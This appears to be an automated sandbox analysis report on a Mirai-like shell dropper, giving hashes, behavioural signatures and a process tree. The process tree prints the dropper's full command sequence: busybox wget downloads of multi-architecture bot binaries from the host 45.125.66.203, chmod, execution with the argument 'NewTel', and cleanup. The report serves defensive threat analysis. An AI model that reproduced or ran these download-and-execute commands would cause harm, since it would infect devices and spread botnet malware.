Analysis
-
max time kernel
150s -
max time network
153s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
-
submitted
23-11-2024 02:46
General
-
Target
a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh
-
Size
1KB
-
MD5
476467eba539be5db3022f1ebde08841
-
SHA1
6fc462604c405f96b0823e2baa077f150b1bb33f
-
SHA256
a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b
-
SHA512
c6fe968567d3e60e8ecef1152c1a389c40245ce0b9a73880a2ff895443bc272000bf76b78c252c646a4a7f737a8564476740fa82792ca9847aa1071f28e47234
Malware Config
Signatures
-
Contacts a large (62273) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 3 IoCs
-
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Renames itself 2 IoCs
-
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Enumerates active TCP sockets 1 TTPs 2 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads process memory 1 TTPs 64 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
-
Changes its process name 2 IoCs
-
Reads system network configuration 1 TTPs 2 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh/tmp/a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh1⤵
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarm -O jklarm2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm./jklarm NewTel2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/bin/busybox/bin/busybox rm -rf jklarm2⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarm5 -O jklarm52⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm52⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm5./jklarm5 NewTel2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/bin/busybox/bin/busybox rm -rf jklarm52⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarm6 -O jklarm62⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm62⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm6./jklarm6 NewTel2⤵
- Executes dropped EXE
-
-
/bin/busybox/bin/busybox rm -rf jklarm62⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarm7 -O jklarm72⤵
-
-
/bin/busybox/bin/busybox chmod +x jklarm72⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm7./jklarm7 NewTel2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklarm72⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklm68k -O jklm68k2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklm68k2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklm68k./jklm68k NewTel2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklm68k2⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklmips -O jklmips2⤵
- System Network Configuration Discovery
-
-
/bin/busybox/bin/busybox chmod +x jklmips2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklmips./jklmips NewTel2⤵
- System Network Configuration Discovery
-
-
/bin/busybox/bin/busybox rm -rf jklmips2⤵
- System Network Configuration Discovery
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklmpsl -O jklmpsl2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklmpsl2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklmpsl./jklmpsl NewTel2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklmpsl2⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklppc -O jklppc2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklppc2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklppc./jklppc NewTel2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklppc2⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklsh4 -O jklsh42⤵
-
-
/bin/busybox/bin/busybox chmod +x jklsh42⤵
- File and Directory Permissions Modification
-
-
/tmp/jklsh4./jklsh4 NewTel2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklsh42⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklspc -O jklspc2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklspc2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklspc./jklspc NewTel2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklspc2⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklx86 -O jklx862⤵
-
-
/bin/busybox/bin/busybox chmod +x jklx862⤵
- File and Directory Permissions Modification
-
-
/tmp/jklx86./jklx86 NewTel2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklx862⤵
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarc -O jklarc2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklarc2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarc./jklarc NewTel2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklarc2⤵
-
-
/bin/busybox/bin/busybox rm -rf wget.sh2⤵
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
61KB
MD5ccc0e90e52316a5e000734aa3ab7ccdb
SHA138974e871dea717ef4d69f3f7644284a1b2a7110
SHA256e3ad3137e9ffc774a2916f5e329689397fc156318c21d5429089e24c3df6536a
SHA512247073ec1f9b19ff2349cc4f67b05e01fc7ce472aef06851ca272c756e439205631c7fe26112cc01db9149e83af550ea5666876bd9b06ca44255ecb4d35e5c1c
-
Filesize
61KB
MD55d2923d3bb5d7daf3c286d3de1c69842
SHA1c761cc78bd7c286b8a95701c8a6c215b0ed7a41f
SHA2564b36c1e443a9b1f76c30d9e4c240cf11ba7728ef0ffb83965fe31720e7c5633e
SHA512593fb52539469a132036265869082eda84b86f4c63937f74b37efa3023a4e8b5b47cdbdcabc13c1257714762c6c25a7305f743dee5ab8c8ef55d64a64f28cda2
-
Filesize
70KB
MD5bd890549b6469679c05204c8893564d9
SHA18e4655e1e4514fc49e19d914ce0e6d482dfe2d71
SHA256e5369f948a5f127f736149c3ba45bb65d0cc463d95bdda10ae4ba428484d43a2
SHA5128cad0724fd27828f29217ebf871975a429e5192427e24390de26d234352ca8d3b429969e27220bee03cd0376613e6e69e01471c5b88e1a074857bcec522ae5c4